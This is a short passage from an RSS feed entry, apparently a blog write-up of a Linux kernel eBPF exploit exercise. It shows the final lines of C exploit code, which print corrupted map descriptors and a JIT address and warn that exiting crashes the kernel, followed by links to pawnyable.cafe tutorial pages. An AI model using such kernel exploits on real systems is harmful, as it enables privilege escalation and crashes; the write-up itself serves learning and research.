  }
  printf(&amp;#34;[+] mapfd: %d\n&amp;#34;, mapfd);
  printf(&amp;#34;[+] corrupted_map_fd: %d\n&amp;#34;, corrupted_map_fd);
  printf(&amp;#34;[+] jit_addr: 0x%016lx\n&amp;#34;, jit_addr);

  get_enter_to_continue(&amp;#34;Press enter to exit(cause kernel crash)...&amp;#34;);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h2 id=&#34;refernece&#34;&gt;Refernece&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/ebpf.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/ebpf.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/verifier.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/verifier.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/exploit.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/exploit.html&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content>
    </item>
    
  </channel>
</rss>
